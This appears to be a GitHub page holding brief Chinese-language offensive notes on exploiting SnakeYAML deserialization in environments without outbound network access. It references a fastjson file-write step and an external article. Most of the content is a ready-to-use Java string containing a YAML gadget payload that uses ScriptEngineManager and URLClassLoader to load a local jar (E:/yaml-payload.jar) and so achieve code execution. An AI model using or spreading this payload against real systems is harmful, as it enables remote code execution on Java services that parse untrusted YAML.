Skip to content

Latest commit

 

History

History
16 lines (12 loc) · 367 Bytes

File metadata and controls

16 lines (12 loc) · 367 Bytes

snakeyaml

不出网利用

通过fastjson写文件如何本地加载rce

https://xz.aliyun.com/t/10655

加载本地

String data2 = "!!javax.script.ScriptEngineManager [\n" +
                "  !!java.net.URLClassLoader [[\n" +
                "    !!java.net.URL [\"file:E:/yaml-payload.jar\"]\n" +
                "  ]]\n" +
                "]";